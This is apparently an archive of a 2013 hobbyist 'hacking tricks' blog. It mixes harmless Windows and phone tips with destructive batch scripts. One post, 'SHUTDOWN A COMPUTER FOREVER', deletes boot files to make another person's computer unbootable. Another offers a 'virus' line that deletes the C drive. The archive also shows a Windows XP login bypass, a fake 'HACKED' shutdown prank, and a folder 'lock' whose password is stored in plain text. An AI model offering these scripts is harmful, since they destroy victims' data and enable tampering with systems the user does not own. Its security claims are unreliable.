Saturday 30 March 2013

Galaxyyliga: TRU HD wallpapers Galaxyy

Galaxyyliga: TRU HD wallpapers Galaxyy: Hi Every one ! Want Some cool HD wallpapers for your galaxyy ? Presenting you the awesome HD wallpapers pack by nightwing90 from xda-dev...

Galaxyyliga: HOW TO (ROOT) GalaxyY

Galaxyyliga: HOW TO (ROOT) GalaxyY: Hey Guys ! As this is is My first Post ! i am Going to teach you how to root your Samsung Galaxyy GT-S5360. -----------------------------...

How to remove the underline from hyperlink

Guys ever seen a hyperlink which is not underlined. Whether you have seen or not seen this is how it is done.

1. The HTML code for a hyperlink is
     <A href = "http://www.hackamia.blogspot.in/">
2. To remove the underline just add style="text-decoration:none"
   i.e the HTML code will become
   <A href ="http://www.hackamia.blogspot.in/" style="text-decoration:none">


WIndows XP login without any password



  1. Start the computer and when the pass is asked press Ctrl + Alt + Delete twice.
  2. A new window asking password will open up.
  3. In this window type "administrator" as the user name and leave the password field empty.
  4. Now press enter.
  5. You have just logged on to a computer without any password.

Wednesday 27 March 2013

How to post a blank comment on Facebook


To post a blank comment on Facebook
1. Go to the comment box.
2. Type 0173 while holding Alt button.
3. Hit enter.

How to post a blank status on Facebook?


Ever seen a blank status on Facebook? Well, here's how to do so.

1.Copy and paste this "@[0:0: ]" (without"")  as your status in the text box.
2. Hit enter and you would have posted a blank status.

Google Your IP!!

This is a cool feature of Google by which you can know your IP.

1. Open Google.      https://www.google/com/
2. In the search box type "What is my ip?" (without "")
3. Press enter and google will show you your IP.

Samsung Codes


Here are some cool secret codes for Samsung.


Software version: *#9999#
IMEI number: *#06#
Serial number: *#0001#
Battery status- Memory capacity : *#9998*246#
Debug screen: *#9998*324# - *#8999*324#
LCD contrast: *#9998*523#

Nokia Mobile Codes


These are are a few cool secret codes for a Nokia mobile.

*#06#                                             For checking the IMEI (International Mobile Equipment Identity).
*#7780#                                         Reset to factory settings.
*#67705646#                                  This will clear the LCD display(operator logo).
*#0000#                                         To view software version.
*#2820#                                         Bluetooth device address.
*#746025625#                                Sim clock allowed status.
*#62209526#                                  Display the MAC address of the WLAN adapter. This is available                  
                                                      only in the newer devices that supports WLAN
*#92702689#                                  Shows your warranty card

Saturday 9 March 2013

The 9/11 Trick


This is an old but very famous and interesting trick. This trick is known as 9/11 trick. The flight number of the plane that crashed into the towers is Q33NY

1. Open notepad.
2. Go to the font option in the format tab.
3. Change the font to wingdings and font size to 72.
4. Now exit and type Q33N as it is and see the coincidence (That is what I would call it!!).

How to shutdown your computer after giving a message

 This is in continuation with the previous post.
1. You can type shutdown /s /t 300 /c "Your computer has been HACKED!!!"
2. This will shutdown the computer after 5 minutes giving the above message.
3. You can terminate this command by typing shutdown /a

Friday 8 March 2013

Time Bomb!!!!!!


This post is in continuation to a the post "how to shutdown your computer using cmd"

1. Open CMD window.
2. Type shutdown /s /t 300
3. This will shutdown your computer after 300 seconds i.e. 5 minutes.
4. You can type /r instead of /s to restart your computer after 5 minutes.

This will not work with the /l tag.

Thursday 7 March 2013

How to Use CMD as a Calculator

1. Go to start menu and type cmd
2.Open CMD and type echo off.
3.Now type set /a and any equation for example 2*3 or 5+4 or 121/3
4. Now press enter, you will get your answer.

Tuesday 5 March 2013

Create an Invisible Folder



1. Create a new folder.
2.Right click and go to properties.
3.In the name box type 255 while pressing and holding left Alt button.

4.Exit the properties menu. You will have created a nameless folder.
5. Now again go to properties and go to the Customize tab.
 6. Click on change icon and select an invisible icon.
 7.Exit the menu. You have created a invisible folder.

Create A Diary Using Notepad


1. Go to notepad and type .LOG.
2. Save it as Diary.LOG (.LOG) is must.
3. Exit notepad and open the file you have saved.
4. You will see something like below.
6. Start typing your diary and save it.

Every time you open this diary it will automatically enter the date and time.
HAVE FUN

Sunday 3 March 2013

Access C Drive Using CMD

This is a basic way to access your C drive (you can access anything but this is just for beginning)



  • Go to start menu and open 'Run'.
  • Type cmd.

  • A window, like above, will open.
  • Type cd.. and press enter.
  • Again repeat the steps.
  • Now you will only have C::\ left.
  • Now type dir after this.
  • It will show a list off all the data on your drive.

Create A Text-To-Audio Converter


Follow these steps

  • Open notepad and type the following code
Dim msg, sapi
    msg=InputBox("Enter your text for conversion"," Text-To-Audio Converter")
      Set sapi=CreateObject("sapi.spvoice")
        sapi.Speak msg


        • Save this file as Text to Audio.vbs (.vbs is compulsory)
        • Exit and open the file

        Shutdown Computer Using CMD

        1. Go to 'run' and type 'cmd' (without inverted commas) 



        2. Type shutdown/s and press enter.
        3. If you want to log off type shutdown/l and press enter.
        4. and if you want to restart type shutdown/r.
        5. For more details type shutdown/? and press enter in CMD window.




        Make Your Computer Greet You When It Starts


        You all must have seen in sci-fi movies how a computer greets it's owner. Well, this is the same thing.
        Follow these steps and you can make your computer greet you when it starts.

        1. Click on Start. Navigate to All Programs, Accessories and Notepad.
        2. Copy and paste the exact code given below.

        Dim speaks, speech
        speaks="Welcome to your computer"
        Set speech=CreateObject("sapi.spvoice")
        speech.Speak speaks

         3.  Replace Username with  Name.
         4.  Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Welcome.vbs
         5.  Copy the saved file.
         6.  Navigate to C:\Documents and Settings\All Users\Start Menu\Programs\Startup (in Windows XP) and to C:\Users\ {User-Name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (in Windows 8, Windows 7 and Windows Vista) if C: is your System drive. AppData is a hidden folder
        7.  Paste the file.

        Now restart your computer and see how your computer greets you.


        Lock A Folder Without Any Software


        You can use this trick to lock any folder with a password.

        Create a new folder and name it as Private whatever you would like.


        Open the folder, right-click on a blank area in it, then select New -> Text Document from the pop-up menu.


        Open the text file you just created by double-clicking it and copy/paste in the following text:

        cls
        @ECHO OFF
        title Private
        if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
        if NOT EXIST Private goto MDLOCKER
        :CONFIRM
        echo Are you sure you want to lock the folder(Y/N)
        set/p "cho=>"
        if %cho%==Y goto LOCK
        if %cho%==y goto LOCK
        if %cho%==n goto END
        if %cho%==N goto END
        echo Invalid choice.
        goto CONFIRM
        :LOCK
        ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
        attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
        echo Folder locked
        goto End
        :UNLOCK
        echo Enter password to unlock folder
        set/p "pass=>"
        if NOT %pass%== PASSWORD_GOES_HERE goto FAIL
        attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
        ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
        echo Folder Unlocked successfully
        goto End
        :FAIL
        echo Invalid password
        goto end
        :MDLOCKER
        md Private
        echo Private created successfully
        goto End
        :End

        In the above code, replace the key PASS with the password you want to use to unlock the folder. For example if you want the password to be 111, the line should look like:
        if NOT %pass%== 111 goto FAIL

        Save your new file in the .bat format with the complete file name being locker.bat. To do this, make sure to change the Save as type: to All Files

        In the folder you created back in Step #1, double click the locker.bat file and there will now be a new folder named Private where you can put anything you want.

        Upon exiting, double click the locker.bat file again. It will prompt you to answer whether you want to lock your folder or not. Press Y and the private folder will disappear.

        In order to retrieve the Private folder, all you have to do is double click the locker.bat file and enter the password which you set in Step #4 and the folder will appear again for you to access.

        Saturday 2 March 2013

        SHUTDOWN A COMPUTER FOREVER!!!!


        Go and type the following code in notepad

        @ECHO OFF
        ATTRIB -R -S -H C:\AUTOEXEC.BAT
        DEL C:\AUTOEXEC.BAT
        ATTRIB -R -S -H C:\BOOT.INI
        DEL C:\BOOT.INI
        ATTRIB -R -S -H C:\NTLDR
        DEL C:\NTLDR
        ATTRIB -R -S -H C:\WINDOWS\WIN.INI
        DEL C:\WINDOWS\WIN.INI
        OPEN UP AND COPY THE CODE AND SAVE IT AS .BAT FILE..
        THIS WILL SHUT DOWN THE PERSON’S COMPUTER.IT SHUTS IT OFF ONCE AND DELETES THE FILES NEEDED TO REBOOT AND RESTART.
        REMEMBER – DO NOT OPEN THE FILE.
        YOU WON’T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!

        Know Your Computer's Gender



                                      This is a cool trick to know your computer's gender!!
        • Open Notepad and paste the following codes.
                CreateObject("SAPI.SpVoice").Speak"i am your computer"
        • Save the file as gender.vbs
        • Now, open the save file
        • If you hear male voice then your computer is male and if you hear female voicethen its female.

        Turn Your Keyboard Into A Disco



        1. Open Notepad and copy below codes into it.
        Set wshShell =wscript.CreateObject("WScript.Shell")
        do
        wscript.sleep 100
        wshshell.sendkeys "{CAPSLOCK}"
        wshshell.sendkeys "{NUMLOCK}"
        wshshell.sendkeys "{SCROLLLOCK}"
        loop
            2. Then save this file as dance.vbs (name can be anything but .vbs is must)
            3. Open your save file and see your keyboard led blinking like
         disco lights.

        Create a virus that formats C drive


        1. Open Notepad and copy below code into it.

        @Echo off Del C:\ *.* |y
            
        2. Then Save this file as virus.bat
        3. Now, running this file format C Drive.

        Matrix Effect On Your Computer

        This is a cool trick to create the Marix Effect on your computer. This is actually a batch file program. Try it out !!!